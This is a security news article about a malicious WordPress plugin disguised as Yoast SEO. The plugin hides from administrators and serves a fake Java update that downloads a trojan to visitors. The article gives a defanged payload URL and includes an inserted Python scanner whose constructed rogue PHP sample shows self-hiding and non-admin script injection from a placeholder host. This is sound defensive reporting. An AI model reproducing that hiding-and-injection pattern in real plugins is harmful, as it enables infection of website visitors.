Fake Java Update in Malicious WordPress Plugin Infects Website Visitors

A new wave of cyberattacks has been discovered targeting WordPress websites through a cleverly disguised malicious plugin.

Security analysts recently investigated persistent fake “Java Update” pop-ups on a client’s WordPress site, ultimately tracing the source to a rogue plugin masquerading as the legitimate “Yoast SEO” tool.

Hidden in the /wp-content/plugins/contact-form/ directory, the plugin incorporated falsified metadata to evade suspicion, while its true functionality was designed to deceive and infect site visitors.

[Image: the fake “Java Update” pop-up served by the malicious WordPress plugin]

Attackers Cloak Malware as Yoast SEO

The attack vector leverages an inline JavaScript payload injected into the <head> of every page for non-admin users, mimicking a legitimate Java update modal.

Beyond the convincing visuals and localized prompts, the pop-up’s underlying code creates a hidden form that silently collects user-interaction data and initiates the download of a malicious .exe file from an external, suspicious domain.

The infection targets users browsing on Windows platforms, intentionally bypassing mobile devices, macOS, and Safari browsers to maximize the success rate of the deployed executable.

A critical feature of the plugin is its advanced obfuscation tactic: upon activation, it removes itself from the standard list of plugins in the WordPress admin panel.

This evasion significantly hampers detection and removal efforts by site administrators, allowing the plugin to persist undetected for extended periods.

Once a user is convinced that the update prompt is genuine and initiates the download, the plugin executes the startUpdate() function.

According to the Sucuri report, this function displays a realistic update progress bar while, in the background, submitting a request to download the malicious file from hxxps://2sopot[.]pl/dw4.php.
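The traits described above (a plugin header that claims to be Yoast SEO while living in a differently named directory, a script injected into the page head only for non-admin visitors, and a payload fetched from the reported URL) can be checked for with a simple source scan. The following is an added example, not code from Sucuri or Cyber Press; it assumes the plugin hides itself through WordPress's all_plugins filter (the article does not name the mechanism), the KNOWN_SLUGS table is illustrative, and the two plugin sources are constructed samples.

```python
"""Added example: flag WordPress plugin sources that show the traits reported for the
fake Java update plugin. Not the project's or the researchers' code; see lead-in."""
import re

# Assumed, illustrative mapping of well-known plugin display names to their official slugs.
KNOWN_SLUGS = {"yoast seo": "wordpress-seo", "contact form 7": "contact-form-7"}

SUSPECT_PATTERNS = {
    # Assumption: the plugin list is usually hidden from by filtering 'all_plugins'.
    "hides_from_plugin_list": re.compile(r"add_filter\(\s*['\"]all_plugins['\"]"),
    "injects_head_script": re.compile(r"add_action\(\s*['\"]wp_head['\"]"),
    "non_admin_gate": re.compile(r"!\s*current_user_can\("),
    # Indicators from the article (defanged there as hxxps://2sopot[.]pl/dw4.php) plus any .exe.
    "downloads_payload": re.compile(r"2sopot\.pl|dw4\.php|\.exe\b", re.I),
}

def plugin_header(src):
    """Return the 'Plugin Name' declared in the file header comment, or None."""
    m = re.search(r"^\s*\*?\s*Plugin Name:\s*(.+?)\s*$", src, re.M)
    return m.group(1) if m else None

def assess_plugin(path, src):
    """path is 'slug/file.php' relative to wp-content/plugins; returns a list of findings."""
    findings = []
    slug = path.split("/", 1)[0]
    name = plugin_header(src)
    expected = KNOWN_SLUGS.get((name or "").lower())
    if expected and expected != slug:
        findings.append(f"name_slug_mismatch:{name!r} claimed in {slug!r}, expected {expected!r}")
    findings += [label for label, rx in SUSPECT_PATTERNS.items() if rx.search(src)]
    return findings

# Constructed sample mimicking the rogue plugin: Yoast metadata inside contact-form/,
# self-hiding filter, and a head script injected for non-admins (placeholder host).
ROGUE = """<?php
/*
 * Plugin Name: Yoast SEO
 * Version: 22.1
 */
add_filter('all_plugins', function ($p) { unset($p[plugin_basename(__FILE__)]); return $p; });
add_action('wp_head', function () {
  if (!current_user_can('manage_options')) echo '<script src="https://example.invalid/dw4.php"></script>';
});
"""
# Constructed benign sample: header name matches its directory, no suspicious hooks.
LEGIT = "<?php\n/*\n * Plugin Name: Contact Form 7\n */\nadd_action('init', 'wpcf7');\n"

if __name__ == "__main__":
    for path, src in {"contact-form/contact-form.php": ROGUE,
                      "contact-form-7/wp-contact-form-7.php": LEGIT}.items():
        print(path, assess_plugin(path, src))
```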

[Image: the malicious download URL used by the plugin]

Once the executable is downloaded, further JavaScript components continue to monitor the user’s system.

By leveraging commands such as tasklist /FO CSV on Windows, the malware checks for the execution of the downloaded payload or any processes with suspicious prefixes, such as those linked to widely abused remote access tools.

If a match is detected, notifications are immediately dispatched to an attacker-controlled Telegram channel, providing real-time updates on successful infections.

Persistent Infection

The infection is further strengthened by session and cookie tracking. The plugin sets a session variable and a persistent cookie upon a download event, ensuring that the fake update prompt does not repeatedly target the same user.

This reduces the likelihood of user suspicion and helps preserve the stealth of the operation.

Technical analysis also reveals that the malware exfiltrates browser and system data, compounding the risks for victims.

Not only are compromised users at risk of credential theft, remote control, and eventual enrolment in botnets, but the site owners themselves face reputational harm, blacklisting by search engines, traffic losses, and increased clean-up costs.

The impact is not negligible: at least 13 websites were confirmed infected at the time of reporting, with the malicious executable flagged as a trojan or hacktool by 13 vendors on VirusTotal.

To defend against such sophisticated cyber threats, organizations are urgently advised to maintain rigorous update cycles for all WordPress components, rely solely on plugins and themes from verified sources, enforce strong password policies and two-factor authentication, deploy Web Application Firewalls (WAF), conduct regular malware scans, and keep redundant, secure backups.

The emergence of this fake Java update campaign underscores the increasing sophistication of contemporary cyberattacks.

By combining admin cloaking, social engineering, and real-time exfiltration, attackers continue to refine their Tactics, Techniques, and Procedures (TTPs), posing ever-greater challenges to both end-users and website administrators.

Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
